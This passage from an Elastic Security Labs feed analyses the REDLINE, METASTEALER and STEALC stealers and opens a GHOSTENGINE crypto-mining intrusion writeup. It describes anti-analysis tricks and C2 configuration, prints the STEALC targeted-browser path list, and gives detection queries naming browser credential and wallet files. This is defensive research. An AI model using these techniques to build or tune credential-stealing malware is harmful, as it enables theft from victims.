<li>If using cloud, is access to cloud storage locked down across multiple regions? (Yes/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Establish a regular review cycle for threat landscape updates.</li>
<li>Engage with external threat intelligence providers for broader insights.</li>
</ul>
<h4>2. Define the Perfect Rule</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Are required fields for a complete rule defined? (Yes/No)</li>
<li>Is there a process for documenting and validating rules? (Yes/No)</li>
<li>Is there a clear process for creating new rules? (Yes/No)</li>
<li>Are rules prioritized for creation and updates based on defined criteria? (Yes/No)</li>
<li>Are templates or guidelines available for rule creation? (Yes/No)</li>
<li>Are rules validated for a period before going into production? (Yes/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Develop and standardize templates for rule creation.</li>
<li>Implement a review process for rule validation before deployment.</li>
</ul>
<h4>3. Define the Perfect Ruleset</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Do you have baseline rules needed to cover key threats? (Yes/No)</li>
<li>Are major threat techniques covered by your ruleset? (Yes/Partial/No)</li>
<li>Is the effectiveness of the ruleset measured? (Yes - Comprehensively/Yes - Partially/No)</li>
<li>Do you have specific criteria used to determine if a rule should be included in the ruleset? (Yes/No)</li>
<li>Is the ruleset maintained and updated? (Yes - Programmatic Maintenance &amp; Frequent Updates/Yes - Programmatic Maintenance &amp; Ad hoc Updates/Yes - Manual Maintenance &amp; Frequent Updates/Yes - Manual Maintenance &amp; Ad Hoc Updates/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Perform gap analysis to identify missing coverage areas.</li>
<li>Regularly update the ruleset based on new threat intelligence and feedback.</li>
</ul>
<h4>4. Maintain</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Are rules reviewed and updated regularly? (Yes - Monthly/Yes - Quarterly/Yes - Annually/No)</li>
<li>Is there a version control system in place? (Yes/No)</li>
<li>Are there documented processes for rule maintenance? (Yes/No)</li>
<li>How are changes to the ruleset communicated to stakeholders? (Regular Meetings/Emails/Documentation/No Communication)</li>
<li>Are there automated processes for rule updates and validation? (Yes/Partial/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Implement version control for all rules.</li>
<li>Establish automated workflows for rule updates and validation.</li>
</ul>
<h4>5. Test &amp; Release</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Are tests performed before rule deployment? (Yes/No)</li>
<li>Is there a documented validation process? (Yes/No)</li>
<li>Are test results documented and used to improve rules? (Yes/No)</li>
<li>Is there a designated person responsible for testing and releasing rules? (Yes/No)</li>
<li>Are there automated testing frameworks in place? (Yes/Partial/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Develop and maintain a testing framework for rule validation.</li>
<li>Document and review test results to continuously improve rule quality.</li>
</ul>
<h4>6. Criteria Assessment</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>Are automated tools, including generative AI, used in the rule assessment process? (Yes/No)</li>
<li>How often are automated assessments conducted using defined criteria? (Monthly/Quarterly/Annually/Never)</li>
<li>What types of automation or AI tools are integrated into the rule assessment process? (List specific tools)</li>
<li>How are automated insights, including those from generative AI, used to optimize rules? (Regular Updates/Ad hoc Updates/Not Used)</li>
<li>What metrics are tracked to measure the effectiveness of automated assessments? (List specific metrics)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Integrate automated tools, including generative AI, into the rule assessment and optimization process.</li>
<li>Regularly review and implement insights from automated assessments to enhance rule quality.</li>
</ul>
<h4>7. Iterate</h4>
<p><strong>Questions to Ask:</strong></p>
<ul>
<li>How frequently is the assessment process revisited? (Monthly/Quarterly/Annually/Never)</li>
<li>What improvements have been identified and implemented from previous assessments? (List specific improvements)</li>
<li>How is feedback from assessments incorporated into the ruleset? (Regular Updates/Ad hoc Updates/Not Used)</li>
<li>Who is responsible for iterating on the ruleset based on assessment feedback? (Designated Role/No Specific Role)</li>
<li>Are there metrics to track progress and improvements over time? (Yes/No)</li>
</ul>
<p><strong>Steps for Improvement:</strong></p>
<ul>
<li>Establish a regular review and iteration cycle.</li>
<li>Track and document improvements and their impact on rule effectiveness.</li>
</ul>
<p><em>The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.</em></p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/elastic-releases-debmm/debmm.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Globally distributed stealers]]></title>
            <link>https://www.elastic.co/es/security-labs/globally-distributed-stealers</link>
            <guid>globally-distributed-stealers</guid>
            <pubDate>Fri, 24 May 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[This article describes our analysis of the top malware stealer families, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>This article describes our analysis of the top Windows malware stealer families that we’ve identified, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly. Additionally, we’ll examine our unique telemetry to offer insights about the current volume associated with these prevalent malware stealer families.</p>
<p>Mitigating this kind of covert threat requires a multi-faceted approach consistent with defense-in-depth principles. We will likewise describe various techniques for detection, including the use of ES|QL hunting queries and Yara rules which empower organizations to proactively defend against them.</p>
<h2>Telemetry overview</h2>
<p>The telemetry data showcased in this article encompasses insights gathered from both internal and external sources, providing a comprehensive understanding of threat activity.</p>
<p>Notably, between 2022 and 2023, REDLINE emerged as the most prevalent malware in the wild, closely trailed by AGENT TESLA, VIDAR, and then STEALC. It's worth highlighting that this period marked the debut of STEALC in the wild, indicative of evolving threat landscapes.</p>
<p>In the subsequent time frame, spanning from 2023 to 2024, there was a notable spike in AGENT TESLA activity, followed by REDLINE, STEALC, and VIDAR, reflecting shifting trends in malware prevalence and distribution.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image6.png" alt="Telemetry data May 2023 - May 2024" />
Elastic telemetry data May 2023 - May 2024</p>
<p>Despite fluctuations in general malware prevalence, AGENT TESLA has consistently maintained its position as a prominent threat. This enduring dominance can be attributed to several factors, including its relatively low price point and enticing capabilities, which appeal to a wide range of threat actors, particularly those operating with limited resources or expertise.</p>
<p>A noteworthy observation is that due to METASTEALER’s foundation on REDLINE, certain METASTEALER samples may inadvertently fall under the categorization of REDLINE.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image5.png" alt="METASTEALER triggering REDLINE signatures" /></p>
<h2>Top stealers overview</h2>
<h3>REDLINE (REDLINE STEALER)</h3>
<p><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer">REDLINE</a> made its debut in the threat landscape in 2020, leveraging email as its initial distribution method; it operates on a Malware-as-a-Service (MaaS) model, making it accessible to a wide range of threat actors. Its affordability and availability in underground forums have contributed to its popularity among cybercriminals.</p>
<p>The latest operations of REDLINE involve multiple infection vectors, including email phishing, malicious websites hosting seemingly legitimate applications, and social engineering tactics. Our researchers analyzed a recent sample <a href="https://x.com/vxunderground/status/1634713832974172167">reported by vx-underground</a> indicating a campaign targeting engineers on the freelancing platform Fiverr. This tactic poses significant risks, potentially leading to the compromise of companies through unsuspecting freelancers.</p>
<p>REDLINE is built on the .NET framework, which provides it with portability and ease of implementation. It has a variety of functionalities aimed at gathering vital system information and extracting sensitive data:</p>
<ul>
<li>System information acquisition:</li>
<li>Collects essential system details such as UserName, Language, and Time Zone</li>
<li>Retrieves hardware specifics including processor and graphic card information</li>
<li>Monitors running processes and identifies installed browsers</li>
<li>Data extraction:</li>
<li>Targets browser data repositories, extracting saved passwords, credit card details, cookies, and auto-fill entries</li>
<li>Procures VPN login credentials for unauthorized access</li>
<li>Logs user credentials and chat histories from platforms like Discord and Telegram</li>
<li>Identifies and steals cryptocurrency wallets, potentially compromising valuable digital assets:</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image13.png" alt="REDLINE collecting system information" /></p>
<p>REDLINE uses a string obfuscation technique to hinder analysis and evade detection based on strings like yara by dynamically constructing the strings at runtime from an array of characters:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image4.png" alt="REDLINE string obfuscation" /></p>
<p>Its configuration is structured within a static class, containing four public fields:  <code>IP</code>,  <code>ID</code>, <code>Message</code>, and an XOR Key. The <code>IP</code> and <code>ID</code> fields contents are encrypted using XOR encryption and then encoded in base64 as depicted below:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image3.png" alt="REDLINE's configuration" /></p>
<h3>METASTEALER</h3>
<p><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer">METASTEALER</a> emerged in 2022, initially advertised as a derivative of REDLINE, with additional features; our malware analysts recently encountered a sample of METASTEALER within a campaign masquerading as Roblox, previously <a href="https://x.com/CERT_OPL/status/1767191320790024484">reported by CERT as Orange Polska</a>.</p>
<p>METASTEALER is primarily developed using the .NET framework, facilitating its compatibility with Windows environments and enabling ease of implementation. Certain versions employ obfuscation methods, including obscuring the control flow of the malware and making it more challenging to detect or analyze.</p>
<p>This METASTEALER sample utilizes the <a href="https://www.secureteam.net/">AGILE.NET</a> obfuscator, specifically its proxy call obfuscation method. This technique is used to conceal the direct invocation of an original function by introducing an additional layer of abstraction. Instead of directly invoking the function, AGILE.NET generates a proxy method that then invokes the original function. This added complexity makes it more challenging for code analysts to discern the sequence of actions.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image9.png" alt="METASTEALER's obfuscation" /></p>
<p>Looking at the code above, we can see the method <code>Delegate11.smethod_0</code> calls a <code>Delegate11.delegate11_0</code> which is not initialized, introducing ambiguity during static analysis as analysts cannot determine which method will actually be executed.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image14.png" alt="METASTEALER initializing the delegate" /></p>
<p>At runtime, the malware will initialize the delegate. by calling the method <code>Class4.smethod_13</code> in the constructor of <code>Delegate11</code> class, this method constructs a dictionary of token values, where each key represents the token value of a delegate (e.g., <code>0x040002DE</code>), and its corresponding value represents the token of the original method to be executed. This dictionary is constructed from a sequence of bytes stored in the binary, enabling dynamic resolution of method invocations during runtime.</p>
<p>Following this, it will generate a dynamic method for the delegate and execute it using the <code>smethod_0</code> function.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image8.png" alt="METASTEALER generating delegates dynamic method" /></p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image7.png" alt="METASTEALER checking for debuggers" /></p>
<p>All the important strings in the configuration, like the C2 IP address and port, are encrypted. The malware has a class called <code>Strings</code> that is called at the start of execution to decrypt all the strings at once, a process involving a combination of Base64 encoding, XOR decryption, and AES CBC decryption.</p>
<p>Initially, the AES parameters, such as the <code>AES KEY</code> and <code>AES IV</code>, undergo decryption. In the provided example, the <code>AES KEY</code> and <code>AES IV</code> are first base64 decoded. Subsequently, they are subjected to XOR decryption using a predetermined XOR key, followed by two consecutive base64 decoding steps.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image1.png" alt="Encrypted AES parameters" /></p>
<p>The Strings class holds byte arrays that are decrypted using AES CBC after being reversed, and then appended to the <strong>Strings.Array</strong> list. Later, when the malware requires specific strings, it accesses them by indexing this list. For example <strong>String.get(6)</strong>.</p>
<h3>STEALC</h3>
<p>A recent major player in the stealer space <a href="https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/">discovered</a> by Sekoia in February 2023 is the <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc">STEALC</a> family. This malware was first advertised in an underground forum in January 2023 where the developer mentioned a major dependency on existing families such as VIDAR, RACOON, and REDLINE. Since this timeframe, our team has observed new STEALC samples daily showing signs of popularity and adoption by cybercriminals.</p>
<p>STEALC is implemented in C and includes features like dynamic imports, string obfuscation, and various anti-analysis checks prior to activating its data-stealing capabilities. In order to protect the binary and its core features, STEALC encrypts its strings using a combination of Base64 + RC4 using a hardcoded key embedded in each sample.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image10.png" alt="Embedded RC4 key and encrypted strings within STEALC" /></p>
<p>There are 6 separate functions used for anti-analysis/anti-sandbox checks within STEALC. Based on the number of processors, STEALC will terminate itself if the active processor count is less than 2.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image2.png" alt="Retrieve number of processors" /></p>
<p>STEALC performs a sandbox/emulation test using a more obscure Windows API (<code>VirtualAllocExNuma</code>) to allocate a large amount of memory. If the API is not implemented, the process will terminate.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image15.png" alt="API check using VirtualAllocExNuma" /></p>
<p>The malware performs another sandbox check by reading values from <code>GlobalMemoryStatusEx</code>. After a byte shift against the collected attributes of the physical memory, if the value is less than <code>0x457</code> the sample will terminate.</p>
<p>The malware will stop execution if the language identifier matches one of the following LangIDs:</p>
<ul>
<li>Russian_Russia  (<code>0x419</code>)</li>
<li>Ukrainian_Ukraine  (<code>0x422</code>)</li>
<li>Belarusian_Belarus (<code>0x423</code>)</li>
<li>Kazakh_Kazakhstan (<code>0x43f</code>)</li>
<li>Uzbek_Latin__Uzbekistan (<code>0x443</code>)</li>
</ul>
<p>STEALC also incorporates the Microsoft Defender emulation check, we have observed this in many stealers such as seen in <a href="https://www.elastic.co/es/security-labs/elastic-security-labs-discovers-lobshot-malware">LOBSHOT</a>. STEALC will terminate if the following hard-coded values match inside Microsoft Defender’s emulation layer with the username <code>JohnDoe</code> and computer name of <code>HAL9TH</code>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/image12.png" alt="Microsoft Defender emulation check using computer name and username" /></p>
<p>One of the more impactful anti-analysis checks that comes with STEALC is an expiration date. This unique value gets placed into the malware’s config to ensure that the stealer won’t execute after a specific date set by the builder. This allows the malware to keep a lower profile by using shorter turnarounds in campaigns and limiting the execution in sandbox environments.</p>
<h4>STEALC - Execution flow</h4>
<p>After its initial execution, STEALC will send the initial hardware ID of the machine and receive a configuration from the C2 server:</p>
<pre><code>f960cc969e79d7b100652712b439978f789705156b5a554db3acca13cb298050efa268fb|done|tested.file|1|1|1|1|1|1|1|1|
</code></pre>
<p>After this request, it will send multiple requests to receive an updated list of targeted browsers and targeted browser extensions. Below is an example of the browser configuration, this contains the targeted directory path where the sensitive data is stored.</p>
<pre><code>Google Chrome|\Google\Chrome\User Data|chrome|chrome.exe|Google Chrome Canary|\Google\Chrome SxS\User Data|chrome|chrome.exe|Chromium|\Chromium\User Data|chrome|chrome.exe|Amigo|\Amigo\User Data|chrome|0|Torch|\Torch\User Data|chrome|0|Vivaldi|\Vivaldi\User Data|chrome|vivaldi.exe|Comodo Dragon|\Comodo\Dragon\User Data|chrome|0|EpicPrivacyBrowser|\Epic Privacy Browser\User Data|chrome|0|CocCoc|\CocCoc\Browser\User Data|chrome|0|Brave|\BraveSoftware\Brave-Browser\User Data|chrome|brave.exe|Cent Browser|\CentBrowser\User Data|chrome|0|7Star|\7Star\7Star\User Data|chrome|0|Chedot Browser|\Chedot\User Data|chrome|0|Microsoft Edge|\Microsoft\Edge\User Data|chrome|msedge.exe|360 Browser|\360Browser\Browser\User Data|chrome|0|QQBrowser|\Tencent\QQBrowser\User Data|chrome|0|CryptoTab|\CryptoTab Browser\User Data|chrome|browser.exe|Opera Stable|\Opera Software|opera|opera.exe|Opera GX Stable|\Opera Software|opera|opera.exe|Mozilla Firefox|\Mozilla\Firefox\Profiles|firefox|0|Pale Moon|\Moonchild Productions\Pale Moon\Profiles|firefox|0|Opera Crypto Stable|\Opera Software|opera|opera.exe|Thunderbird|\Thunderbird\Profiles|firefox|0|
</code></pre>
<p>At this point, STEALC will then collect a broad range of victim information. This information is then formatted, Base64 encoded, and then sent to the C2 server over POST requests using form data fields.</p>
<ul>
<li>Hardware ID</li>
<li>Windows OS product info</li>
<li>Processor / RAM information</li>
<li>Username / computername</li>
<li>Local system time / time zone / locale of victim</li>
<li>Keyboard layout</li>
<li>Battery check (used to determine if laptop or not)</li>
<li>Desktop resolution, display info</li>
<li>Installed programs, running processes</li>
</ul>
<p>For the stealing component, STEALC leverages the received configurations in order to collect various valuable information including:</p>
<ul>
<li>Browser cookies</li>
<li>Login data</li>
<li>Web data</li>
<li>History</li>
<li>Cryptocurrency wallets</li>
</ul>
<p>STEALC also offers other various configuration options including:</p>
<ul>
<li>Telegram data</li>
<li>Discord</li>
<li>Tox</li>
<li>Pidgin</li>
<li>Steam</li>
<li>Outlook emails</li>
</ul>
<table>
<thead>
<tr>
<th></th>
<th>RedLine Stealer</th>
<th>Meta Stealer</th>
<th>Stealc</th>
</tr>
</thead>
<tbody>
<tr>
<td>First time seen in the wild</td>
<td>2020</td>
<td>2022</td>
<td>2023</td>
</tr>
<tr>
<td>Source Language</td>
<td>C#</td>
<td>C#</td>
<td>C</td>
</tr>
<tr>
<td>Average size (unpacked)</td>
<td>253 KB</td>
<td>278 KB</td>
<td>107 KB</td>
</tr>
<tr>
<td>String obfuscation? Algo?</td>
<td>Yes</td>
<td>Yes</td>
<td>Yes (custom RC4 + base64)</td>
</tr>
</tbody>
</table>
<h2>Detection</h2>
<p>To fully leverage detection capabilities listed below for these threats with Elastic Security, it is essential to integrate <a href="https://docs.elastic.co/en/integrations/endpoint">Elastic Defend</a> and <a href="https://docs.elastic.co/en/integrations/windows">Windows</a>.</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_an_unsigned_binary.toml">Connection to WebService by an Unsigned Binary</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/command_and_control_connection_to_webservice_by_a_signed_binary_proxy.toml">Connection to WebService by a Signed Binary Proxy</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/command_and_control_suspicious_dns_query_from_mounted_virtual_disk.toml">Suspicious DNS Query from Mounted Virtual Disk</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_suspicious_access_to_web_browser_credential_stores.toml">Suspicious Access to Web Browser Credential Stores</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_web_browser_credential_access_via_unsigned_process.toml">Web Browser Credential Access via Unsigned Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_access_to_browser_credentials_from_suspicious_memory.toml">Access to Browser Credentials from Suspicious Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_failed_access_attempt_to_web_browser_files.toml">Failed Access Attempt to Web Browser Files</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_web_browser_credential_access_via_unusual_process.toml">Web Browser Credential Access via Unusual Process</a></li>
</ul>
<h3>ES|QL queries</h3>
<p>The following list of hunts and detection queries can be used to detect stealers activities:</p>
<ul>
<li>
<p>Identifies untrusted or unsigned executables making DNS requests to Telegram or Discord domains, which may indicate command-and-control communication attempts.</p>
<pre><code class="language-sql">from logs-endpoint*
| where (process.code_signature.trusted == false or process.code_signature.exists == false)
| where dns.question.name in (&quot;api.telegram.com&quot;, &quot;cdn.discordapp.com&quot;,
                                &quot;discordapp.com&quot;, &quot;discord.com&quot;,&quot;discord.gg&quot;,&quot;cdn.discordapp.com&quot;)
| stats executable_count = count(*) by process.executable, process.name, dns.question.name
| sort executable_count desc
</code></pre>
</li>
<li>
<p>Detects suspicious activies targeting crypto wallets files and configurations stored on Windows systems.</p>
<pre><code class="language-sql">from logs-endpoint.events.file-*
| where @timestamp &gt; now() - 14 days
| where host.os.type == &quot;windows&quot;
and event.category == &quot;file&quot;
and event.action == &quot;open&quot; 
and (
  file.path rlike &quot;&quot;&quot;C:\\Users\\.+\\AppData\\Roaming\\.+\\(Bitcoin|Ethereum|Electrum|Zcash|Monero|Wallet|Litecoin|Dogecoin|Coinbase|Exodus|Jaxx|MyEtherWallet|MetaMask)\\.*&quot;&quot;&quot;
  or file.path rlike &quot;&quot;&quot;C:\\ProgramData\\.+\\(Bitcoin|Ethereum|Electrum|Zcash|Monero|Wallet|Litecoin|Dogecoin|Coinbase|Exodus|Jaxx|MyEtherWallet|MetaMask)\\.*&quot;&quot;&quot;
)
| keep process.executable, process.name, host.id, file.path, file.name
| stats number_hosts = count_distinct(host.id), unique_files = count_distinct(file.name) by process.executable
| where number_hosts == 1 and unique_files &gt;= 3
| sort number_hosts desc
</code></pre>
</li>
<li>
<p>Monitors access to sensitive browser data, such as cookies, login data, and browsing history, which may indicate information-stealing malware activities.</p>
<pre><code class="language-sql">from logs-endpoint.events.file-*, logs-windows.sysmon_operational-default-*
| where @timestamp &gt; now() - 14 days
| where host.os.type == &quot;windows&quot;
and event.category == &quot;file&quot;
and event.action in (&quot;open&quot;, &quot;modification&quot;)
and (
  file.path rlike &quot;C:\\\\Users\\\\.+\\\\AppData\\\\Local\\\\(Google\\\\Chrome\\\\User Data\\\\.*|Google\\\\Chrome SxS\\\\User Data\\\\.*|Chromium\\\\User Data\\\\.*|Amigo\\\\User Data\\\\.*|Torch\\\\User Data\\\\.*|Vivaldi\\\\User Data\\\\.*|Comodo\\\\Dragon\\\\User Data\\\\.*|Epic Privacy Browser\\\\User Data\\\\.*|CocCoc\\\\Browser\\\\User Data\\\\.*|BraveSoftware\\\\Brave-Browser\\\\User Data\\\\.*|CentBrowser\\\\User Data\\\\.*|7Star\\\\7Star\\\\User Data\\\\.*|Chedot\\\\User Data\\\\.*|Microsoft\\\\Edge\\\\User Data\\\\.*|360Browser\\\\Browser\\\\User Data\\\\.*|Tencent\\\\QQBrowser\\\\User Data\\\\.*|CryptoTab Browser\\\\User Data\\\\.*|Opera Software\\\\Opera Stable\\\\.*|Opera Software\\\\Opera GX Stable\\\\.*)\\\\(Default|Profile \\\\d+)\\\\(Cookies|Login Data|Web Data|History|Bookmarks|Preferences|Visited Links|Network Action Predictor|Top Sites|Favicons|Shortcuts)&quot;
  or file.path rlike &quot;C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\.*\\\\(cookies.sqlite|logins.json|places.sqlite|key4.db|cert9.db)&quot;
  or file.path rlike &quot;C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\Moonchild Productions\\\\Pale Moon\\\\Profiles\\\\.*\\\\(cookies.sqlite|logins.json|places.sqlite|key3.db|cert8.db)&quot;
  or file.path rlike &quot;C:\\\\Users\\\\.+\\\\AppData\\\\Roaming\\\\Thunderbird\\\\Profiles\\\\.*\\\\(cookies.sqlite|logins.json|key4.db|cert9.db)&quot;
)
| keep process.executable, process.name, event.action, host.id, host.name, file.path, file.name
| eval process_path = replace(process.executable, &quot;([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}|ns[a-z][A-Z0-9]{3,4}\\.tmp|DX[A-Z0-9]{3,4}\\.tmp|7z[A-Z0-9]{3,5}\\.tmp|[0-9\\.\\-_]{3,})&quot;, &quot;&quot;)
| eval process_path = replace(process_path, &quot;[cC]:\\\\[uU][sS][eE][rR][sS]\\\\[a-zA-Z0-9\\.\\-_\\$~ ]+\\\\&quot;, &quot;C:\\\\users\\\\user\\\\&quot;)
| eval normalized_file_path = replace(file.path, &quot;[cC]:\\\\[uU][sS][eE][rR][sS]\\\\[a-zA-Z0-9\\.\\-_\\$~ ]+\\\\&quot;, &quot;C:\\\\users\\\\user\\\\&quot;)
| stats number_hosts = count_distinct(host.id) by process.executable, process.name, event.action, normalized_file_path, file.name, host.name
| where number_hosts == 1
| sort number_hosts desc
</code></pre>
</li>
</ul>
<h3>Yara rules</h3>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_MetaStealer.yar">Windows Trojan MetaStealer</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Stealc.yar">Windows Trojan Stealc</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_RedLineStealer.yar">Windows Trojan RedLineStealer</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_AgentTesla.yar">Windows Trojan AgentTesla</a></li>
</ul>
<h2>Conclusion</h2>
<p>In conclusion, it's crucial to recognize that these malware threats pose significant risks to both companies and individuals alike. Their affordability makes them accessible not only to sophisticated cybercriminals but also to small-time offenders and script kiddies. This accessibility underscores the democratisation of cybercrime, where even individuals with limited technical expertise can deploy malicious software.</p>
<p>Elastic's comprehensive suite of security features offers organisations and individuals the tools they need to defend against malware attacks effectively. From advanced threat detection to real-time monitoring and response capabilities.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/globally-distributed-stealers/Security Labs Images 25.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Invisible miners: unveiling GHOSTENGINE’s crypto mining operations]]></title>
            <link>https://www.elastic.co/es/security-labs/invisible-miners-unveiling-ghostengine</link>
            <guid>invisible-miners-unveiling-ghostengine</guid>
            <pubDate>Wed, 22 May 2024 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs has identified REF4578, an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Elastic Security Labs has identified an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining. Additionally, the team discovered capabilities to establish persistence, install a previously undocumented backdoor, and execute a crypto-miner. We refer to this intrusion set as REF4578 and the primary payload as GHOSTENGINE (tangental research by the team at Antiy has named parts of this intrusion set <a href="https://www.antiy.com/response/HideShoveling.html">HIDDENSHOVEL</a>).</p>
<h2>Key takeaways</h2>
<ul>
<li>Malware authors incorporated many contingency and duplication mechanisms</li>
<li>GHOSTENGINE leverages vulnerable drivers to terminate and delete known EDR agents that would likely interfere with the deployed and well-known coin miner</li>
<li>This campaign involved an uncommon amount of complexity to ensure both the installation and persistence of the XMRIG miner</li>
</ul>
<h2>Code analysis</h2>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image4.png" alt="REF4578 execution flow" title="REF4578 execution flow" /></p>
<p>On May 6, 2024, at 14:08:33 UTC,  the execution of a PE file named <code>Tiworker.exe</code> (masquerading as the legitimate Windows <code>TiWorker.exe</code> file) signified the beginning of the REF4578 intrusion. The following alerts were captured in telemetry, indicating a known vulnerable driver was deployed.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image8.png" alt="REF4578 executes Tiworker to start the infection chain" title="REF4578 executes Tiworker to start the infection chain" /></p>
<p>Upon execution, this file downloads and executes a PowerShell script that orchestrates the entire execution flow of the intrusion. Analysis revealed that this binary executes a hardcoded PowerShell command line to retrieve an obfuscated script, <code>get.png,</code> which is used to download further tools, modules, and configurations from the attacker C2– as depicted in the screenshot below.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image10.png" alt="Downloading get.png" title="Downloading get.png" /></p>
<h3>GHOSTENGINE</h3>
<p>GHOSTENGINE is responsible for retrieving and executing modules on the machine. It primarily uses HTTP to download files from a configured domain, with a backup IP in case domains are unavailable. Additionally, it employs FTP as a secondary protocol with embedded credentials. The following is a summary of the execution flow:</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image11.png" alt="The get.png PowerShell script" title="The get.png PowerShell script" /></p>
<p>This script downloads and executes <code>clearn.png</code>, a component designed to purge the system of remnants from prior infections belonging to the same family but different campaign; it removes malicious files under <code>C:\Program Files\Common Files\System\ado</code> and <code>C:\PROGRA~1\COMMON~1\System\ado\</code> and removes the following scheduled tasks by name:</p>
<ul>
<li><code>Microsoft Assist Job</code></li>
<li><code>System Help Center Job</code></li>
<li><code>SystemFlushDns</code></li>
<li><code>SystemFlashDnsSrv</code></li>
</ul>
<p>Evidence of those scheduled task artifacts may be indicators of a prior infection.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image12.png" alt="clearn.png removing any infections from previous campaigns" title="clearn.png removing any infections from previous campaigns" /></p>
<p>During execution, it attempts to disable Windows Defender and clean the following Windows event log channels:</p>
<ul>
<li><code>Application</code></li>
<li><code>Security</code></li>
<li><code>Setup</code></li>
<li><code>System</code></li>
<li><code>Forwarded Events</code></li>
<li><code>Microsoft-Windows-Diagnostics-Performance</code></li>
<li><code>Microsoft-Windows-AppModel-Runtime/Operational</code></li>
<li><code>Microsoft-Windows-Winlogon/Operational</code></li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/invisible-miners-unveiling-ghostengine/image13.png" alt="get.png clearing Windows log channels" title="get.png clearing Windows log channels" /></p>
<p><code>get.png</code> disables Windows Defender, enables remote services, and clears the contents of:</p>
<ul>
<li><code>C:\Windows\Temp\</code></li>
<li><code>C:\Windows\Logs\</code></li>
<li><code>C:\$Recycle.Bin\</code></li>
<li><code>C:\windows\ZAM.krnl.trace</code></li>
</ul>
